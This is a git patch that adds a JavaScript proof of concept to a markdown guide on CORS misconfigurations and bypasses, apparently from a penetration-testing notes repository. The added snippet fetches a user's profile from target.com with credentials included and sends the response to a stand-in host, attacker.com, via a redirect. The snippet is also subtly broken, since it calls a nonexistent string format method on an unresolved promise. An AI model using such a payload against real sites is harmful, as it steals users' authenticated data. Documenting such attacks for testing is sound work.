From fb0c538961af2606dd8a49a4d75d811e6670f43e Mon Sep 17 00:00:00 2001
From: Mehdi <pentest.co@gmail.com>
Date: Fri, 23 Aug 2024 16:44:56 +0330
Subject: [PATCH] Update CORS - Misconfigurations & Bypass.md

---
 CORS - Misconfigurations & Bypass.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/CORS - Misconfigurations & Bypass.md b/CORS - Misconfigurations & Bypass.md
index 68abf53..8206245 100644
--- a/CORS - Misconfigurations & Bypass.md	
+++ b/CORS - Misconfigurations & Bypass.md	
@@ -30,6 +30,15 @@ xhr.withCredentials = true;
 xhr.send(null);
 ```
 
+```javascript
+fetch("https://target.com/api/user/profile", {
+	credentials: "include"
+})
+.then((response) => {
+	document.location = "//attacker.com/log?key={0}".format(response.text());
+});
+```
+
 ```javascript
 fetch(url, {
   credentials: 'include'